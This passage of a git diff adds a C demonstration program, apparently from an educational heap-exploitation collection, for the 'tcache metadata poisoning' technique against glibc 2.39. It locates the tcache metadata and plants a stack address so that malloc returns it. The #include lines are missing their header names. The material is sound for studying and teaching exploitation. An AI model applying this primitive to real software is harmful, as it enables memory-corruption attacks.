+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}
diff --git a/glibc_2.39/tcache_metadata_poisoning.c b/glibc_2.39/tcache_metadata_poisoning.c
new file mode 100644
index 0000000..356debc
--- /dev/null
+++ b/glibc_2.39/tcache_metadata_poisoning.c
@@ -0,0 +1,59 @@
+#include
+#include
+#include
+#include
+
+// Tcache metadata poisoning attack
+// ================================
+//
+// By controlling the metadata of the tcache an attacker can insert malicious
+// pointers into the tcache bins. This pointer then can be easily accessed by
+// allocating a chunk of the appropriate size.
+
+// By default there are 64 tcache bins
+#define TCACHE_BINS 64
+// The header of a heap chunk is 0x10 bytes in size
+#define HEADER_SIZE 0x10
+
+// This is the `tcache_perthread_struct` (or the tcache metadata)
+struct tcache_metadata {
+ uint16_t counts[TCACHE_BINS];
+ void *entries[TCACHE_BINS];
+};
+
+int main() {
+ // Disable buffering
+ setbuf(stdin, NULL);
+ setbuf(stdout, NULL);
+
+ uint64_t stack_target = 0x1337;
+
+ puts("This example demonstrates what an attacker can achieve by controlling\n"
+ "the metadata chunk of the tcache.\n");
+ puts("First we have to allocate a chunk to initialize the stack. This chunk\n"
+ "will also serve as the relative offset to calculate the base of the\n"
+ "metadata chunk.");
+ uint64_t *victim = malloc(0x10);
+ printf("Victim chunk is at: %p.\n\n", victim);
+
+ long metadata_size = sizeof(struct tcache_metadata);
+ printf("Next we have to calculate the base address of the metadata struct.\n"
+ "The metadata struct itself is %#lx bytes in size. Additionally we\n"
+ "have to subtract the header of the victim chunk (so an extra 0x10\n"
+ "bytes).\n",
+ sizeof(struct tcache_metadata));
+ struct tcache_metadata *metadata =
+ (struct tcache_metadata *)((long)victim - HEADER_SIZE - metadata_size);
+ printf("The tcache metadata is located at %p.\n\n", metadata);
+
+ puts("Now we manipulate the metadata struct and insert the target address\n"
+ "in a chunk. Here we choose the second tcache bin.\n");
+ metadata->counts[1] = 1;
+ metadata->entries[1] = &stack_target;
+
+ uint64_t *evil = malloc(0x20);
+ printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n"
+ "second tcache bin. The returned pointer is %p.\n",
+ evil);
+ assert(evil == &stack_target);
+}